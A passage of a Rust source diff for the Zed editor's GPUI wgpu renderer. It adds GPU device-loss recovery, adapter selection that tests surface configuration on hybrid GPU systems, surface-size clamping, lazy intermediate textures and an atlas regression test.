WebWindowInner { Some(closure) } + pub(crate) fn with_input_handler( + &self, + f: impl FnOnce(&mut PlatformInputHandler) -> R, + ) -> Option { + let mut handler = self.state.borrow_mut().input_handler.take()?; + let result = f(&mut handler); + self.state.borrow_mut().input_handler = Some(handler); + Some(result) + } + pub(crate) fn register_appearance_change( self: &Rc, ) -> Option> { @@ -637,6 +665,20 @@ impl PlatformWindow for WebWindow { } fn draw(&self, scene: &Scene) { + if let Some((width, height)) = self.inner.pending_physical_size.take() { + if self.inner.canvas.width() != width || self.inner.canvas.height() != height { + self.inner.canvas.set_width(width); + self.inner.canvas.set_height(height); + } + + let mut state = self.inner.state.borrow_mut(); + state.renderer.update_drawable_size(Size { + width: DevicePixels(width as i32), + height: DevicePixels(height as i32), + }); + drop(state); + } + self.inner.state.borrow_mut().renderer.draw(scene); } diff --git a/crates/gpui_wgpu/src/gpui_wgpu.rs b/crates/gpui_wgpu/src/gpui_wgpu.rs index a306a9d4cac2251a46cd1115462bdcbe4b368759..452c3c03f51282c34368527dd503b90b92193586 100644 --- a/crates/gpui_wgpu/src/gpui_wgpu.rs +++ b/crates/gpui_wgpu/src/gpui_wgpu.rs @@ -4,6 +4,7 @@ mod wgpu_context; mod wgpu_renderer; pub use cosmic_text_system::*; +pub use wgpu; pub use wgpu_atlas::*; pub use wgpu_context::*; -pub use wgpu_renderer::*; +pub use wgpu_renderer::{GpuContext, WgpuRenderer, WgpuSurfaceConfig}; diff --git a/crates/gpui_wgpu/src/wgpu_atlas.rs b/crates/gpui_wgpu/src/wgpu_atlas.rs index ffef3a65398c3f03639a8551506463f91a862c33..55f6edee21b9f2da02268c66c665c34d5b52066a 100644 --- a/crates/gpui_wgpu/src/wgpu_atlas.rs +++ b/crates/gpui_wgpu/src/wgpu_atlas.rs @@ -65,6 +65,17 @@ impl WgpuAtlas { view: texture.view.clone(), } } + + /// Handles device lost by clearing all textures and cached tiles. + /// The atlas will lazily recreate textures as needed on subsequent frames. 
+ pub fn handle_device_lost(&self, device: Arc, queue: Arc) { + let mut lock = self.0.lock(); + lock.device = device; + lock.queue = queue; + lock.storage = WgpuAtlasStorage::default(); + lock.tiles_by_key.clear(); + lock.pending_uploads.clear(); + } } impl PlatformAtlas for WgpuAtlas { @@ -104,6 +115,8 @@ impl PlatformAtlas for WgpuAtlas { if let Some(mut texture) = texture_slot.take() { texture.decrement_ref_count(); if texture.is_unreferenced() { + lock.pending_uploads + .retain(|upload| upload.id != texture.id); lock.storage[id.kind] .free_list .push(texture.id.index as usize); @@ -217,7 +230,9 @@ impl WgpuAtlasState { fn flush_uploads(&mut self) { for upload in self.pending_uploads.drain(..) { - let texture = &self.storage[upload.id]; + let Some(texture) = self.storage.get(upload.id) else { + continue; + }; let bytes_per_pixel = texture.bytes_per_pixel(); self.queue.write_texture( @@ -275,6 +290,15 @@ impl ops::IndexMut for WgpuAtlasStorage { } } +impl WgpuAtlasStorage { + fn get(&self, id: AtlasTextureId) -> Option<&WgpuAtlasTexture> { + self[id.kind] + .textures + .get(id.index as usize) + .and_then(|t| t.as_ref()) + } +} + impl ops::Index for WgpuAtlasStorage { type Output = WgpuAtlasTexture; fn index(&self, id: AtlasTextureId) -> &Self::Output { @@ -330,3 +354,70 @@ impl WgpuAtlasTexture { self.live_atlas_keys == 0 } } + +#[cfg(all(test, not(target_family = "wasm")))] +mod tests { + use super::*; + use gpui::{ImageId, RenderImageParams}; + use pollster::block_on; + use std::sync::Arc; + + fn test_device_and_queue() -> anyhow::Result<(Arc, Arc)> { + block_on(async { + let instance = wgpu::Instance::new(wgpu::InstanceDescriptor { + backends: wgpu::Backends::all(), + flags: wgpu::InstanceFlags::default(), + backend_options: wgpu::BackendOptions::default(), + memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: None, + }); + let adapter = instance + .request_adapter(&wgpu::RequestAdapterOptions { + power_preference: 
wgpu::PowerPreference::LowPower, + compatible_surface: None, + force_fallback_adapter: false, + }) + .await + .map_err(|error| anyhow::anyhow!("failed to request adapter: {error}"))?; + let (device, queue) = adapter + .request_device(&wgpu::DeviceDescriptor { + label: Some("wgpu_atlas_test_device"), + required_features: wgpu::Features::empty(), + required_limits: wgpu::Limits::downlevel_defaults() + .using_resolution(adapter.limits()) + .using_alignment(adapter.limits()), + memory_hints: wgpu::MemoryHints::MemoryUsage, + trace: wgpu::Trace::Off, + experimental_features: wgpu::ExperimentalFeatures::disabled(), + }) + .await + .map_err(|error| anyhow::anyhow!("failed to request device: {error}"))?; + Ok((Arc::new(device), Arc::new(queue))) + }) + } + + #[test] + fn before_frame_skips_uploads_for_removed_texture() -> anyhow::Result<()> { + let (device, queue) = test_device_and_queue()?; + + let atlas = WgpuAtlas::new(device, queue); + let key = AtlasKey::Image(RenderImageParams { + image_id: ImageId(1), + frame_index: 0, + }); + let size = Size { + width: DevicePixels(1), + height: DevicePixels(1), + }; + let mut build = || Ok(Some((size, Cow::Owned(vec![0, 0, 0, 255])))); + + // Regression test: before the fix, this panicked in flush_uploads + atlas + .get_or_insert_with(&key, &mut build)? 
+ .expect("tile should be created"); + atlas.remove(&key); + atlas.before_frame(); + + Ok(()) + } +} diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 38a27d0623c821144a2b0ba4ed5cadaaceb03812..7c03c4752ebf2e76b04c384722f4a9c17054487a 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -3,6 +3,7 @@ use anyhow::Context as _; #[cfg(not(target_family = "wasm"))] use gpui_util::ResultExt; use std::sync::Arc; +use std::sync::atomic::{AtomicBool, Ordering}; pub struct WgpuContext { pub instance: wgpu::Instance, @@ -10,11 +11,22 @@ pub struct WgpuContext { pub device: Arc, pub queue: Arc, dual_source_blending: bool, + device_lost: Arc, +} + +#[derive(Clone, Copy)] +pub struct CompositorGpuHint { + pub vendor_id: u32, + pub device_id: u32, } impl WgpuContext { #[cfg(not(target_family = "wasm"))] - pub fn new(instance: wgpu::Instance, surface: &wgpu::Surface<'_>) -> anyhow::Result { + pub fn new( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + ) -> anyhow::Result { let device_id_filter = match std::env::var("ZED_DEVICE_ID") { Ok(val) => parse_pci_id(&val) .context("Failed to parse device ID from `ZED_DEVICE_ID` environment variable") @@ -27,24 +39,26 @@ impl WgpuContext { } }; - let adapter = pollster::block_on(Self::select_adapter( - &instance, - device_id_filter, - Some(surface), - ))?; - - let caps = surface.get_capabilities(&adapter); - if caps.formats.is_empty() { - let info = adapter.get_info(); - anyhow::bail!( - "No adapter compatible with the display surface could be found. \ - Best candidate {:?} (backend={:?}, device={:#06x}) reports no \ - supported surface formats.", - info.name, - info.backend, - info.device, - ); - } + // Select an adapter by actually testing surface configuration with the real device. + // This is the only reliable way to determine compatibility on hybrid GPU systems. 
+ let (adapter, device, queue, dual_source_blending) = + pollster::block_on(Self::select_adapter_and_device( + &instance, + device_id_filter, + surface, + compositor_gpu.as_ref(), + ))?; + + let device_lost = Arc::new(AtomicBool::new(false)); + device.set_device_lost_callback({ + let device_lost = Arc::clone(&device_lost); + move |reason, message| { + log::error!("wgpu device lost: reason={reason:?}, message={message}"); + if reason != wgpu::DeviceLostReason::Destroyed { + device_lost.store(true, Ordering::Relaxed); + } + } + }); log::info!( "Selected GPU adapter: {:?} ({:?})", @@ -52,25 +66,24 @@ impl WgpuContext { adapter.get_info().backend ); - let (device, queue, dual_source_blending) = - pollster::block_on(Self::create_device(&adapter))?; - Ok(Self { instance, adapter, device: Arc::new(device), queue: Arc::new(queue), dual_source_blending, + device_lost, }) } #[cfg(target_family = "wasm")] pub async fn new_web() -> anyhow::Result { - let instance = wgpu::Instance::new(&wgpu::InstanceDescriptor { + let instance = wgpu::Instance::new(wgpu::InstanceDescriptor { backends: wgpu::Backends::BROWSER_WEBGPU | wgpu::Backends::GL, flags: wgpu::InstanceFlags::default(), backend_options: wgpu::BackendOptions::default(), memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: None, }); let adapter = instance @@ -88,6 +101,7 @@ impl WgpuContext { adapter.get_info().backend ); + let device_lost = Arc::new(AtomicBool::new(false)); let (device, queue, dual_source_blending) = Self::create_device(&adapter).await?; Ok(Self { @@ -96,6 +110,7 @@ impl WgpuContext { device: Arc::new(device), queue: Arc::new(queue), dual_source_blending, + device_lost, }) } @@ -120,7 +135,9 @@ impl WgpuContext { .request_device(&wgpu::DeviceDescriptor { label: Some("gpui_device"), required_features, - required_limits: wgpu::Limits::downlevel_defaults(), + required_limits: wgpu::Limits::downlevel_defaults() + .using_resolution(adapter.limits()) + .using_alignment(adapter.limits()), 
memory_hints: wgpu::MemoryHints::MemoryUsage, trace: wgpu::Trace::Off, experimental_features: wgpu::ExperimentalFeatures::disabled(), @@ -132,12 +149,13 @@ impl WgpuContext { } #[cfg(not(target_family = "wasm"))] - pub fn instance() -> wgpu::Instance { - wgpu::Instance::new(&wgpu::InstanceDescriptor { + pub fn instance(display: Box) -> wgpu::Instance { + wgpu::Instance::new(wgpu::InstanceDescriptor { backends: wgpu::Backends::VULKAN | wgpu::Backends::GL, flags: wgpu::InstanceFlags::default(), backend_options: wgpu::BackendOptions::default(), memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: Some(display), }) } @@ -156,75 +174,176 @@ impl WgpuContext { Ok(()) } + /// Select an adapter and create a device, testing that the surface can actually be configured. + /// This is the only reliable way to determine compatibility on hybrid GPU systems, where + /// adapters may report surface compatibility via get_capabilities() but fail when actually + /// configuring (e.g., NVIDIA reporting Vulkan Wayland support but failing because the + /// Wayland compositor runs on the Intel GPU). #[cfg(not(target_family = "wasm"))] - async fn select_adapter( + async fn select_adapter_and_device( instance: &wgpu::Instance, device_id_filter: Option, - compatible_surface: Option<&wgpu::Surface<'_>>, - ) -> anyhow::Result { + surface: &wgpu::Surface<'_>, + compositor_gpu: Option<&CompositorGpuHint>, + ) -> anyhow::Result<(wgpu::Adapter, wgpu::Device, wgpu::Queue, bool)> { + let mut adapters: Vec<_> = instance.enumerate_adapters(wgpu::Backends::all()).await; + + if adapters.is_empty() { + anyhow::bail!("No GPU adapters found"); + } + if let Some(device_id) = device_id_filter { - let adapters: Vec<_> = instance.enumerate_adapters(wgpu::Backends::all()).await; + log::info!("ZED_DEVICE_ID filter: {:#06x}", device_id); + } - if adapters.is_empty() { - anyhow::bail!("No GPU adapters found"); - } + // Sort adapters into a single priority order. 
Tiers (from highest to lowest): + // + // 1. ZED_DEVICE_ID match — explicit user override + // 2. Compositor GPU match — the GPU the display server is rendering on + // 3. Device type (Discrete > Integrated > Other > Virtual > Cpu). + // "Other" ranks above "Virtual" because OpenGL seems to count as "Other". + // 4. Backend — prefer Vulkan/Metal/Dx12 over GL/etc. + adapters.sort_by_key(|adapter| { + let info = adapter.get_info(); + + // Backends like OpenGL report device=0 for all adapters, so + // device-based matching is only meaningful when non-zero. + let device_known = info.device != 0; + + let user_override: u8 = match device_id_filter { + Some(id) if device_known && info.device == id => 0, + _ => 1, + }; + + let compositor_match: u8 = match compositor_gpu { + Some(hint) + if device_known + && info.vendor == hint.vendor_id + && info.device == hint.device_id => + { + 0 + } + _ => 1, + }; + + let type_priority: u8 = match info.device_type { + wgpu::DeviceType::DiscreteGpu => 0, + wgpu::DeviceType::IntegratedGpu => 1, + wgpu::DeviceType::Other => 2, + wgpu::DeviceType::VirtualGpu => 3, + wgpu::DeviceType::Cpu => 4, + }; + + let backend_priority: u8 = match info.backend { + wgpu::Backend::Vulkan => 0, + wgpu::Backend::Metal => 0, + wgpu::Backend::Dx12 => 0, + _ => 1, + }; + + ( + user_override, + compositor_match, + type_priority, + backend_priority, + ) + }); + + // Log all available adapters (in sorted order) + log::info!("Found {} GPU adapter(s):", adapters.len()); + for adapter in &adapters { + let info = adapter.get_info(); + log::info!( + " - {} (vendor={:#06x}, device={:#06x}, backend={:?}, type={:?})", + info.name, + info.vendor, + info.device, + info.backend, + info.device_type, + ); + } - let mut non_matching_adapter_infos: Vec = Vec::new(); - - for adapter in adapters.into_iter() { - let info = adapter.get_info(); - if info.device == device_id { - if let Some(surface) = compatible_surface { - let caps = surface.get_capabilities(&adapter); - if 
caps.formats.is_empty() { - log::warn!( - "GPU matching ZED_DEVICE_ID={:#06x} ({}) is not compatible \ - with the display surface. Falling back to auto-selection.", - device_id, - info.name, - ); - break; - } - } + // Test each adapter by creating a device and configuring the surface + for adapter in adapters { + let info = adapter.get_info(); + log::info!("Testing adapter: {} ({:?})...", info.name, info.backend); + + match Self::try_adapter_with_surface(&adapter, surface).await { + Ok((device, queue, dual_source_blending)) => { + log::info!( + "Selected GPU (passed configuration test): {} ({:?})", + info.name, + info.backend + ); + return Ok((adapter, device, queue, dual_source_blending)); + } + Err(e) => { log::info!( - "Found GPU matching ZED_DEVICE_ID={:#06x}: {}", - device_id, - info.name + " Adapter {} ({:?}) failed: {}, trying next...", + info.name, + info.backend, + e ); - return Ok(adapter); - } else { - non_matching_adapter_infos.push(info); } } + } - log::warn!( - "No compatible GPU found matching ZED_DEVICE_ID={:#06x}. Available devices:", - device_id - ); + anyhow::bail!("No GPU adapter found that can configure the display surface") + } - for info in &non_matching_adapter_infos { - log::warn!( - " - {} (device_id={:#06x}, backend={})", - info.name, - info.device, - info.backend - ); - } + /// Try to use an adapter with a surface by creating a device and testing configuration. + /// Returns the device and queue if successful, allowing them to be reused. 
+ #[cfg(not(target_family = "wasm"))] + async fn try_adapter_with_surface( + adapter: &wgpu::Adapter, + surface: &wgpu::Surface<'_>, + ) -> anyhow::Result<(wgpu::Device, wgpu::Queue, bool)> { + let caps = surface.get_capabilities(adapter); + if caps.formats.is_empty() { + anyhow::bail!("no compatible surface formats"); + } + if caps.alpha_modes.is_empty() { + anyhow::bail!("no compatible alpha modes"); } - instance - .request_adapter(&wgpu::RequestAdapterOptions { - power_preference: wgpu::PowerPreference::HighPerformance, - compatible_surface, - force_fallback_adapter: false, - }) - .await - .map_err(|e| anyhow::anyhow!("Failed to request GPU adapter: {e}")) + let (device, queue, dual_source_blending) = Self::create_device(adapter).await?; + let error_scope = device.push_error_scope(wgpu::ErrorFilter::Validation); + + let test_config = wgpu::SurfaceConfiguration { + usage: wgpu::TextureUsages::RENDER_ATTACHMENT, + format: caps.formats[0], + width: 64, + height: 64, + present_mode: wgpu::PresentMode::Fifo, + desired_maximum_frame_latency: 2, + alpha_mode: caps.alpha_modes[0], + view_formats: vec![], + }; + + surface.configure(&device, &test_config); + + let error = error_scope.pop().await; + if let Some(e) = error { + anyhow::bail!("surface configuration failed: {e}"); + } + + Ok((device, queue, dual_source_blending)) } pub fn supports_dual_source_blending(&self) -> bool { self.dual_source_blending } + + /// Returns true if the GPU device was lost (e.g., due to driver crash, suspend/resume). + /// When this returns true, the context should be recreated. + pub fn device_lost(&self) -> bool { + self.device_lost.load(Ordering::Relaxed) + } + + /// Returns a clone of the device_lost flag for sharing with renderers. 
+ pub(crate) fn device_lost_flag(&self) -> Arc { + Arc::clone(&self.device_lost) + } } #[cfg(not(target_family = "wasm"))] diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 489f354c691c280a5331e5a7765c9d626064eb9c..c25cba935447d76f0e112079b7c81a9463109806 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1,14 +1,17 @@ -use crate::{WgpuAtlas, WgpuContext}; +use crate::{CompositorGpuHint, WgpuAtlas, WgpuContext}; use bytemuck::{Pod, Zeroable}; use gpui::{ AtlasTextureId, Background, Bounds, DevicePixels, GpuSpecs, MonochromeSprite, Path, Point, PolychromeSprite, PrimitiveBatch, Quad, ScaledPixels, Scene, Shadow, Size, SubpixelSprite, Underline, get_gamma_correction_ratios, }; +use log::warn; #[cfg(not(target_family = "wasm"))] use raw_window_handle::{HasDisplayHandle, HasWindowHandle}; +use std::cell::RefCell; use std::num::NonZeroU64; -use std::sync::Arc; +use std::rc::Rc; +use std::sync::{Arc, Mutex}; #[repr(C)] #[derive(Clone, Copy, Pod, Zeroable)] @@ -68,6 +71,13 @@ struct PathRasterizationVertex { pub struct WgpuSurfaceConfig { pub size: Size, pub transparent: bool, + /// Preferred presentation mode. When `Some`, the renderer will use this + /// mode if supported by the surface, falling back to `Fifo`. + /// When `None`, defaults to `Fifo` (VSync). + /// + /// Mobile platforms may prefer `Mailbox` (triple-buffering) to avoid + /// blocking in `get_current_texture()` during lifecycle transitions. + pub preferred_present_mode: Option, } struct WgpuPipelines { @@ -90,56 +100,93 @@ struct WgpuBindGroupLayouts { surfaces: wgpu::BindGroupLayout, } -pub struct WgpuRenderer { +/// Shared GPU context reference, used to coordinate device recovery across multiple windows. +pub type GpuContext = Rc>>; + +/// GPU resources that must be dropped together during device recovery. 
+struct WgpuResources { device: Arc, queue: Arc, surface: wgpu::Surface<'static>, - surface_config: wgpu::SurfaceConfiguration, pipelines: WgpuPipelines, bind_group_layouts: WgpuBindGroupLayouts, - atlas: Arc, atlas_sampler: wgpu::Sampler, globals_buffer: wgpu::Buffer, - path_globals_offset: u64, - gamma_offset: u64, globals_bind_group: wgpu::BindGroup, path_globals_bind_group: wgpu::BindGroup, instance_buffer: wgpu::Buffer, + path_intermediate_texture: Option, + path_intermediate_view: Option, + path_msaa_texture: Option, + path_msaa_view: Option, +} + +pub struct WgpuRenderer { + /// Shared GPU context for device recovery coordination (unused on WASM). + #[allow(dead_code)] + context: Option, + /// Compositor GPU hint for adapter selection (unused on WASM). + #[allow(dead_code)] + compositor_gpu: Option, + resources: Option, + surface_config: wgpu::SurfaceConfiguration, + atlas: Arc, + path_globals_offset: u64, + gamma_offset: u64, instance_buffer_capacity: u64, max_buffer_size: u64, storage_buffer_alignment: u64, - path_intermediate_texture: wgpu::Texture, - path_intermediate_view: wgpu::TextureView, - path_msaa_texture: Option, - path_msaa_view: Option, rendering_params: RenderingParameters, dual_source_blending: bool, adapter_info: wgpu::AdapterInfo, transparent_alpha_mode: wgpu::CompositeAlphaMode, opaque_alpha_mode: wgpu::CompositeAlphaMode, + max_texture_size: u32, + last_error: Arc>>, + failed_frame_count: u32, + device_lost: std::sync::Arc, + surface_configured: bool, } impl WgpuRenderer { + fn resources(&self) -> &WgpuResources { + self.resources + .as_ref() + .expect("GPU resources not available") + } + + fn resources_mut(&mut self) -> &mut WgpuResources { + self.resources + .as_mut() + .expect("GPU resources not available") + } + /// Creates a new WgpuRenderer from raw window handles. /// + /// The `gpu_context` is a shared reference that coordinates GPU context across + /// multiple windows. 
The first window to create a renderer will initialize the + /// context; subsequent windows will share it. + /// /// # Safety /// The caller must ensure that the window handle remains valid for the lifetime /// of the returned renderer. #[cfg(not(target_family = "wasm"))] - pub fn new( - gpu_context: &mut Option, + pub fn new( + gpu_context: GpuContext, window: &W, config: WgpuSurfaceConfig, - ) -> anyhow::Result { + compositor_gpu: Option, + ) -> anyhow::Result + where + W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static, + { let window_handle = window .window_handle() .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; - let display_handle = window - .display_handle() - .map_err(|e| anyhow::anyhow!("Failed to get display handle: {e}"))?; let target = wgpu::SurfaceTargetUnsafe::RawHandle { - raw_display_handle: display_handle.as_raw(), + // Fall back to the display handle already provided via InstanceDescriptor::display. + raw_display_handle: None, raw_window_handle: window_handle.as_raw(), }; @@ -147,9 +194,10 @@ impl WgpuRenderer { // The surface must be created with the same instance that will be used for // adapter selection, otherwise wgpu will panic. let instance = gpu_context + .borrow() .as_ref() .map(|ctx| ctx.instance.clone()) - .unwrap_or_else(WgpuContext::instance); + .unwrap_or_else(|| WgpuContext::instance(Box::new(window.clone()))); // Safety: The caller guarantees that the window handle is valid for the // lifetime of this renderer. In practice, the RawWindow struct is created @@ -160,15 +208,28 @@ impl WgpuRenderer { .map_err(|e| anyhow::anyhow!("Failed to create surface: {e}"))? 
}; - let context = match gpu_context { + let mut ctx_ref = gpu_context.borrow_mut(); + let context = match ctx_ref.as_mut() { Some(context) => { context.check_compatible_with_surface(&surface)?; context } - None => gpu_context.insert(WgpuContext::new(instance, &surface)?), + None => ctx_ref.insert(WgpuContext::new(instance, &surface, compositor_gpu)?), }; - Self::new_with_surface(context, surface, config) + let atlas = Arc::new(WgpuAtlas::new( + Arc::clone(&context.device), + Arc::clone(&context.queue), + )); + + Self::new_internal( + Some(Rc::clone(&gpu_context)), + context, + surface, + config, + compositor_gpu, + atlas, + ) } #[cfg(target_family = "wasm")] @@ -181,13 +242,22 @@ impl WgpuRenderer { .instance .create_surface(wgpu::SurfaceTarget::Canvas(canvas.clone())) .map_err(|e| anyhow::anyhow!("Failed to create surface: {e}"))?; - Self::new_with_surface(context, surface, config) + + let atlas = Arc::new(WgpuAtlas::new( + Arc::clone(&context.device), + Arc::clone(&context.queue), + )); + + Self::new_internal(None, context, surface, config, None, atlas) } - pub fn new_with_surface( + fn new_internal( + gpu_context: Option, context: &WgpuContext, surface: wgpu::Surface<'static>, config: WgpuSurfaceConfig, + compositor_gpu: Option, + atlas: Arc, ) -> anyhow::Result { let surface_caps = surface.get_capabilities(&context.adapter); let preferred_formats = [ @@ -238,19 +308,39 @@ impl WgpuRenderer { opaque_alpha_mode }; + let device = Arc::clone(&context.device); + let max_texture_size = device.limits().max_texture_dimension_2d; + + let requested_width = config.size.width.0 as u32; + let requested_height = config.size.height.0 as u32; + let clamped_width = requested_width.min(max_texture_size); + let clamped_height = requested_height.min(max_texture_size); + + if clamped_width != requested_width || clamped_height != requested_height { + warn!( + "Requested surface size ({}, {}) exceeds maximum texture dimension {}. \ + Clamping to ({}, {}). 
Window content may not fill the entire window.", + requested_width, requested_height, max_texture_size, clamped_width, clamped_height + ); + } + let surface_config = wgpu::SurfaceConfiguration { usage: wgpu::TextureUsages::RENDER_ATTACHMENT, format: surface_format, - width: config.size.width.0 as u32, - height: config.size.height.0 as u32, - present_mode: wgpu::PresentMode::Fifo, + width: clamped_width.max(1), + height: clamped_height.max(1), + present_mode: config + .preferred_present_mode + .filter(|mode| surface_caps.present_modes.contains(mode)) + .unwrap_or(wgpu::PresentMode::Fifo), desired_maximum_frame_latency: 2, alpha_mode, view_formats: vec![], }; + // Configure the surface immediately. The adapter selection process already validated + // that this adapter can successfully configure this surface. surface.configure(&context.device, &surface_config); - let device = Arc::clone(&context.device); let queue = Arc::clone(&context.queue); let dual_source_blending = context.supports_dual_source_blending(); @@ -265,7 +355,6 @@ impl WgpuRenderer { dual_source_blending, ); - let atlas = Arc::new(WgpuAtlas::new(Arc::clone(&device), Arc::clone(&queue))); let atlas_sampler = device.create_sampler(&wgpu::SamplerDescriptor { label: Some("atlas_sampler"), mag_filter: wgpu::FilterMode::Linear, @@ -296,23 +385,6 @@ impl WgpuRenderer { mapped_at_creation: false, }); - let (path_intermediate_texture, path_intermediate_view) = Self::create_path_intermediate( - &device, - surface_format, - config.size.width.0 as u32, - config.size.height.0 as u32, - ); - - let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( - &device, - surface_format, - config.size.width.0 as u32, - config.size.height.0 as u32, - rendering_params.path_sample_count, - ) - .map(|(t, v)| (Some(t), Some(v))) - .unwrap_or((None, None)); - let globals_bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor { label: Some("globals_bind_group"), layout: &bind_group_layouts.globals, @@ -361,33 
+433,53 @@ impl WgpuRenderer { let adapter_info = context.adapter.get_info(); - Ok(Self { + let last_error: Arc>> = Arc::new(Mutex::new(None)); + let last_error_clone = Arc::clone(&last_error); + device.on_uncaptured_error(Arc::new(move |error| { + let mut guard = last_error_clone.lock().unwrap(); + *guard = Some(error.to_string()); + })); + + let resources = WgpuResources { device, queue, surface, - surface_config, pipelines, bind_group_layouts, - atlas, atlas_sampler, globals_buffer, - path_globals_offset, - gamma_offset, globals_bind_group, path_globals_bind_group, instance_buffer, + // Defer intermediate texture creation to first draw call via ensure_intermediate_textures(). + // This avoids panics when the device/surface is in an invalid state during initialization. + path_intermediate_texture: None, + path_intermediate_view: None, + path_msaa_texture: None, + path_msaa_view: None, + }; + + Ok(Self { + context: gpu_context, + compositor_gpu, + resources: Some(resources), + surface_config, + atlas, + path_globals_offset, + gamma_offset, instance_buffer_capacity: initial_instance_buffer_capacity, max_buffer_size, storage_buffer_alignment, - path_intermediate_texture, - path_intermediate_view, - path_msaa_texture, - path_msaa_view, rendering_params, dual_source_blending, adapter_info, transparent_alpha_mode, opaque_alpha_mode, + max_texture_size, + last_error, + failed_frame_count: 0, + device_lost: context.device_lost_flag(), + surface_configured: true, }) } @@ -523,6 +615,28 @@ impl WgpuRenderer { path_sample_count: u32, dual_source_blending: bool, ) -> WgpuPipelines { + // Diagnostic guard: verify the device actually has + // DUAL_SOURCE_BLENDING. We have a crash report (ZED-5G1) where a + // feature mismatch caused a wgpu-hal abort, but we haven't + // identified the code path that produces the mismatch. This + // guard prevents the crash and logs more evidence. 
+ // Remove this check once: + // a) We find and fix the root cause, or + // b) There are no reports of this warning appearing for some time. + let device_has_feature = device + .features() + .contains(wgpu::Features::DUAL_SOURCE_BLENDING); + if dual_source_blending && !device_has_feature { + log::error!( + "BUG: dual_source_blending flag is true but device does not \ + have DUAL_SOURCE_BLENDING enabled (device features: {:?}). \ + Falling back to mono text rendering. Please report this at \ + https://github.com/zed-industries/zed/issues", + device.features(), + ); + } + let dual_source_blending = dual_source_blending && device_has_feature; + let base_shader_source = include_str!("shaders.wgsl"); let shader_module = device.create_shader_module(wgpu::ShaderModuleDescriptor { label: Some("gpui_shaders"), @@ -566,7 +680,7 @@ impl WgpuRenderer { module: &wgpu::ShaderModule| { let pipeline_layout = device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor { label: Some(&format!("{name}_layout")), - bind_group_layouts: &[globals_layout, data_layout], + bind_group_layouts: &[Some(globals_layout), Some(data_layout)], immediate_size: 0, }); @@ -825,32 +939,79 @@ impl WgpuRenderer { let height = size.height.0 as u32; if width != self.surface_config.width || height != self.surface_config.height { - self.surface_config.width = width.max(1); - self.surface_config.height = height.max(1); - self.surface.configure(&self.device, &self.surface_config); - - let (path_intermediate_texture, path_intermediate_view) = - Self::create_path_intermediate( - &self.device, - self.surface_config.format, - self.surface_config.width, - self.surface_config.height, + let clamped_width = width.min(self.max_texture_size); + let clamped_height = height.min(self.max_texture_size); + + if clamped_width != width || clamped_height != height { + warn!( + "Requested surface size ({}, {}) exceeds maximum texture dimension {}. \ + Clamping to ({}, {}). 
Window content may not fill the entire window.", + width, height, self.max_texture_size, clamped_width, clamped_height ); - self.path_intermediate_texture = path_intermediate_texture; - self.path_intermediate_view = path_intermediate_view; - - let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( - &self.device, - self.surface_config.format, - self.surface_config.width, - self.surface_config.height, - self.rendering_params.path_sample_count, - ) - .map(|(t, v)| (Some(t), Some(v))) - .unwrap_or((None, None)); - self.path_msaa_texture = path_msaa_texture; - self.path_msaa_view = path_msaa_view; + } + + self.surface_config.width = clamped_width.max(1); + self.surface_config.height = clamped_height.max(1); + let surface_config = self.surface_config.clone(); + + let resources = self.resources_mut(); + + // Wait for any in-flight GPU work to complete before destroying textures + if let Err(e) = resources.device.poll(wgpu::PollType::Wait { + submission_index: None, + timeout: None, + }) { + warn!("Failed to poll device during resize: {e:?}"); + } + + // Destroy old textures before allocating new ones to avoid GPU memory spikes + if let Some(ref texture) = resources.path_intermediate_texture { + texture.destroy(); + } + if let Some(ref texture) = resources.path_msaa_texture { + texture.destroy(); + } + + resources + .surface + .configure(&resources.device, &surface_config); + + // Invalidate intermediate textures - they will be lazily recreated + // in draw() after we confirm the surface is healthy. This avoids + // panics when the device/surface is in an invalid state during resize. 
+ resources.path_intermediate_texture = None; + resources.path_intermediate_view = None; + resources.path_msaa_texture = None; + resources.path_msaa_view = None; + } + } + + fn ensure_intermediate_textures(&mut self) { + if self.resources().path_intermediate_texture.is_some() { + return; } + + let format = self.surface_config.format; + let width = self.surface_config.width; + let height = self.surface_config.height; + let path_sample_count = self.rendering_params.path_sample_count; + let resources = self.resources_mut(); + + let (t, v) = Self::create_path_intermediate(&resources.device, format, width, height); + resources.path_intermediate_texture = Some(t); + resources.path_intermediate_view = Some(v); + + let (path_msaa_texture, path_msaa_view) = Self::create_msaa_if_needed( + &resources.device, + format, + width, + height, + path_sample_count, + ) + .map(|(t, v)| (Some(t), Some(v))) + .unwrap_or((None, None)); + resources.path_msaa_texture = path_msaa_texture; + resources.path_msaa_view = path_msaa_view; } pub fn update_transparency(&mut self, transparent: bool) { @@ -862,14 +1023,20 @@ impl WgpuRenderer { if new_alpha_mode != self.surface_config.alpha_mode { self.surface_config.alpha_mode = new_alpha_mode; - self.surface.configure(&self.device, &self.surface_config); - self.pipelines = Self::create_pipelines( - &self.device, - &self.bind_group_layouts, - self.surface_config.format, - self.surface_config.alpha_mode, - self.rendering_params.path_sample_count, - self.dual_source_blending, + let surface_config = self.surface_config.clone(); + let path_sample_count = self.rendering_params.path_sample_count; + let dual_source_blending = self.dual_source_blending; + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + resources.pipelines = Self::create_pipelines( + &resources.device, + &resources.bind_group_layouts, + surface_config.format, + surface_config.alpha_mode, + path_sample_count, + 
